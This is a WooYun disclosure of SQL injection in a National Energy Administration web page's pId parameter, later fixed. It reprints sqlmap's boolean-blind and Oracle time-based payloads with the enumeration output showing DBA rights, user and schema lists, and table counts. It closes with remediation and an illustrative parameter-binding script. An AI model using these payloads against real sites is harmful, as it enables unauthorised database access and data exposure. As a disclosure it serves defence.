
Vulnerability summary

Defect ID: wooyun-2016-0191989

Title: SQL injection on a National Energy Administration (国家能源局) site (DBA privileges / 51 databases, i.e. Oracle schemas, reachable / large-scale data exposure)

Vendor: CNCERT (cncert国家互联网应急中心, National Internet Emergency Center)

Reporter: 路人甲

Submitted: 2016-04-03 12:30

Fixed: 2016-05-21 11:50

Published: 2016-05-21 11:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to the third-party partner organization (CNCERT, cncert国家互联网应急中心) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-04-03: Details sent to the vendor, awaiting vendor action
2016-04-06: Vendor confirmed; details visible to the vendor only
2016-04-16: Details disclosed to core white hats and domain experts
2016-04-26: Details disclosed to regular white hats
2016-05-06: Details disclosed to intern white hats
2016-05-21: Details disclosed to the public

Brief description:

Judging from the databases, a large amount of data could be leaked; I will not list it all one by one!~~~
Home page?

Detailed description:

Origin:

http://**.**.**.**/action/front/indexAction_prepareIndex


The "Featured Columns" (特色专栏) section links to a site that has the vulnerability.
Injection point:

http://**.**.**.**/SEMIS_DL/page/DoorPage/substance.aspx?action=aff&pId=1365176182

The pId parameter is injectable. Both payloads below close the single-quoted string that the page wraps around pId, append a condition, and re-balance the quote at the end ('LouG'='LouG), so the value is being concatenated into a WHERE clause as a string literal rather than bound as a parameter.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=aff&pId=1365176182' AND 9212=9212 AND 'LouG'='LouG
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: action=aff&pId=1365176182' AND 6182=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(68)||CHR(73)||CHR(98),5) AND 'EKXG'='EKXG
---
[20:11:58] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[20:11:58] [INFO] fetching current user
[20:11:58] [INFO] retrieving the length of query output
[20:11:58] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://**.**.**.**:80/SEMIS_DL/page/ieaa/commonpage/error.aspx'. Do you want to follow? [Y/n] y
[20:12:01] [WARNING] reflective value(s) found and filtering out
11
[20:12:25] [INFO] retrieved: SS_M__HZJGJ 8/11 (73%)
[20:12:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[20:12:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[20:12:29] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[20:12:33] [INFO] retrieved: SS_MS_HZJGJ 9/11 (82%)
[20:12:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[20:12:36] [INFO] retrieved: SSTMS_HZJGJ
current user: 'SSTMS_HZJGJ'
[20:12:36] [INFO] fetching current database
[20:12:36] [INFO] retrieving the length of query output
[20:12:36] [INFO] resumed: 11
[20:12:36] [INFO] resumed: SSTMS_HZJGJ
[20:12:36] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SSTMS_HZJGJ'
[20:12:36] [INFO] testing if current user is DBA
current user is DBA: True
database management system users [58]:
[*] AGSMS
[*] ANONYMOUS
[*] BI
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] DTSXSMS
[*] DTSXSMS_IEAA5
[*] EDUPRJ_GDSL
[*] EXFSYS
[*] EXMA_DL
[*] EXMA_SL
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SEMIS_SL
[*] SEMIS_SLS
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SSTMS_COMMON
[*] SSTMS_DL
[*] SSTMS_DTBC
[*] SSTMS_DTBJ
[*] SSTMS_GDFJ
[*] SSTMS_HB
[*] SSTMS_HDAH
[*] SSTMS_HDFJ
[*] SSTMS_HDFJ_TEST
[*] SSTMS_HDXY
[*] SSTMS_HZJGJ
[*] SSTMS_JZ
[*] SSTMS_LCJ
[*] SSTMS_SL
[*] SSTMS_SN
[*] SSTMS_SXDD
[*] SSTMS_TEST
[*] SSTMS_ZA
[*] SSTMS_ZDTC_TEST
[*] SSTMS_ZDTHN
[*] SSTMS_ZDTSC
[*] SSTMS_ZT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
available databases [51]:
[*] AGSMS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DTSXSMS
[*] DTSXSMS_IEAA5
[*] EDUPRJ_GDSL
[*] EXFSYS
[*] EXMA_DL
[*] EXMA_SL
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SEMIS_SL
[*] SEMIS_SLS
[*] SH
[*] SSTMS_COMMON
[*] SSTMS_DL
[*] SSTMS_DTBC
[*] SSTMS_DTBJ
[*] SSTMS_GDFJ
[*] SSTMS_HB
[*] SSTMS_HDAH
[*] SSTMS_HDFJ
[*] SSTMS_HDFJ_TEST
[*] SSTMS_HDXY
[*] SSTMS_HZJGJ
[*] SSTMS_JZ
[*] SSTMS_LCJ
[*] SSTMS_SL
[*] SSTMS_SN
[*] SSTMS_SXDD
[*] SSTMS_TEST
[*] SSTMS_ZA
[*] SSTMS_ZDTC_TEST
[*] SSTMS_ZDTHN
[*] SSTMS_ZDTSC
[*] SSTMS_ZT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SSTMS_HZJGJ
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| EDUTBTESTMANAGER | 107075 |
| EDUTBWRONGRECORD | 50694 |
| EDUTBUSERSUBJOINDETAIL | 21406 |
| EDUTBGRASP | 11357 |
| EDUTBLESSONMAINTREE | 7264 |
| EDUTBGRADEMANAGE | 4248 |
| STATBCULTBDEPART | 3255 |
| QUESTIONRECORD | 2297 |
| SETBATTENDANCE | 1768 |
| EDUTBCURRICULUM | 1356 |
| SETBHISTORYRECORD | 1021 |
| SYSAMTBPARTY | 898 |
| EDUTBUSERSUBJOIN | 819 |
| SYSAMTBPARTY_ROLE | 732 |
| SYSAMTBUSER | 729 |
| SYSSMTBCUSTOMIZE | 675 |
| SYSAMTBUSER_STATION | 589 |
| SYSSMPASSWORDHISTORY | 587 |
| EDUTBTRAINUSERINFO | 567 |
| EDUTBAPPLYUSERINFO | 558 |
| SEAPPLYUSERINFO | 550 |
| SEEXAMUSERINFO | 549 |
| EDUTBTRAINPROJECTDETAIL | 494 |
| EDUTBGAMES | 427 |
| SYSFMTBATTACHMENT | 389 |
| SYSTBTABLEINFO | 363 |
| SECERTIFICATE | 251 |
| SYSAMTBRESOURCE | 241 |
| EDUTBEXAMCURR | 204 |
| SYSAMTBDEPART | 164 |
| SEBUSINESSUSER | 143 |
| SYSTBHINTINFO | 111 |
| SYSSMTBCONTROLINFO | 105 |
| EDUTBCURRTRAIN | 84 |
| SETHINGPROMPT | 71 |
| SYSAMTBMODULE | 71 |
| EDUTBCURRICULUMNOTE | 63 |
| SYSTBCODECONTENT | 60 |
| SYSSMTBCODECONTENT | 57 |
| EDUTBEXAMPOLICY | 30 |
| SYSAMTBROLE_RESOURCE | 28 |
| SYSSMTBPARAMETER | 27 |
| EDUTBJOBTYPE | 26 |
| EDUTBTRAINPROJECT | 25 |
| SYSSMTBINTERMESSAGE | 22 |
| EDUTBTEACHERLIB | 21 |
| EDUTBEXAMAPPLY | 18 |
| EDUTBWARRANT | 18 |
| SYSSMTBAFFICHE | 18 |
| SEFOREGROUNDMODEL | 17 |
| EDUTBEXAMMANAGE | 16 |
| SEAPPLYTRAINPJC | 15 |
| SESTARAPPLY | 15 |
| SEEXAMPLACE | 14 |
| EDUTBTRAINPROJECTAPPLY | 13 |
| SEEXAMPC | 13 |
| EDUTBSTENCIL | 11 |
| SYSSMTBCODEKIND | 11 |
| SYSAMTBSTATION | 10 |
| EDUTBBUILDPAPERPOLICY | 9 |
| SEMACHINE | 9 |
| EDUTBTRAINAGENCY | 7 |
| SYSTBDOCTYPE | 7 |
| EDUTBCURRSORT | 6 |
| SYSAMTBPARTYROLE | 6 |
| SETRAINACCEPT | 4 |
| SYSTBCODEKIND | 4 |
| SEEXAMTEACHER | 3 |
| EDUTBSORT | 2 |
| SEMODELACHIE | 1 |
| SYSAMTBACTIVEUSER | 1 |
+-------------------------+---------+


Too slow, so I did not continue!~~~ This is enough as proof.

[Attached screenshots: 1.jpg, 2.jpg, 3.jpg, 4.jpg]


Proof of vulnerability:

As above.

Remediation:

Filter the input and restrict database privileges: validate pId as a numeric identifier and pass it to the query as a bound parameter instead of concatenating it into the SQL string, and connect the application with a dedicated Oracle account that does not hold the DBA role (sqlmap reports the current user SSTMS_HZJGJ as DBA, which is what exposes all 51 schemas from a single injection point).
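As an added illustration that is not part of the original report or of the affected site's code, the script below reproduces the mechanics of the boolean-based blind payload sqlmap reported for pId and contrasts the concatenated query with the validated, parameter-bound form the remediation calls for. It uses an in-memory SQLite table with one constructed row as a stand-in for the Oracle SSTMS_HZJGJ schema; the table and column names, the sample row and the false-condition payload are assumptions, while the true-condition payload is the one from the sqlmap output above.

```python
import re
import sqlite3

# Constructed stand-in for the SSTMS_HZJGJ schema: one table keyed by pId.
# sqlite3 replaces the site's Oracle back end (assumption); only the
# string-concatenation bug and the bind-parameter fix are exercised here,
# and both behave the same way on either engine.
SCHEMA = """
CREATE TABLE substance (pId TEXT PRIMARY KEY, title TEXT);
INSERT INTO substance VALUES ('1365176182', 'constructed sample record');
"""

# True-condition payload copied from the report's sqlmap output: it closes the
# quoted pId literal, appends a tautology, and re-balances the trailing quote.
TRUE_PAYLOAD = "1365176182' AND 9212=9212 AND 'LouG'='LouG"
# Constructed false-condition counterpart (not in the report): same shape,
# contradiction instead of tautology.
FALSE_PAYLOAD = "1365176182' AND 9212=9213 AND 'LouG'='LouG"


def connect():
    """Creates the in-memory sample database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, pid):
    """Builds the WHERE clause by string concatenation, which is what the
    report's quote-closing payloads imply the real page does.
    Returns the list of matched titles."""
    sql = f"SELECT title FROM substance WHERE pId = '{pid}'"
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn, pid):
    """Rejects anything that is not a decimal identifier, then binds the value
    as a parameter so it can never alter the statement's structure."""
    if not re.fullmatch(r"\d{1,19}", pid):
        raise ValueError("pId must be a decimal identifier")
    sql = "SELECT title FROM substance WHERE pId = ?"
    return [row[0] for row in conn.execute(sql, (pid,))]


def boolean_blind_oracle(conn, lookup):
    """Mimics sqlmap's boolean-based blind test: the parameter is injectable
    when the true and false conditions produce different responses.
    Returns True if `lookup` can be told apart by the two payloads."""
    def try_payload(payload):
        try:
            return lookup(conn, payload)
        except (ValueError, sqlite3.Error):
            return None  # rejected input or SQL error: one fixed response
    return try_payload(TRUE_PAYLOAD) != try_payload(FALSE_PAYLOAD)


if __name__ == "__main__":
    conn = connect()
    print("vulnerable, true condition :", vulnerable_lookup(conn, TRUE_PAYLOAD))
    print("vulnerable, false condition:", vulnerable_lookup(conn, FALSE_PAYLOAD))
    print("vulnerable injectable      :", boolean_blind_oracle(conn, vulnerable_lookup))
    print("hardened injectable        :", boolean_blind_oracle(conn, hardened_lookup))
    print("hardened, legitimate id    :", hardened_lookup(conn, "1365176182"))
```

With the concatenated query the true payload returns the row and the false payload returns nothing, which is exactly the response difference a blind attacker (or sqlmap) reads one bit at a time; with validation plus a bound parameter both payloads are rejected identically and only the plain identifier resolves. The report's time-based payload (DBMS_PIPE.RECEIVE_MESSAGE) is Oracle-specific and is not reproduced here, and the DBA finding is addressed by the account-privilege part of the remediation, not by this code.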

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-04-06 11:46

Vendor reply:

CNVD confirmed and reproduced the described issue. It has been forwarded through CNCERT to the energy sector's information-technology authority, which will coordinate follow-up handling with the organization that operates the site.

Latest status:

None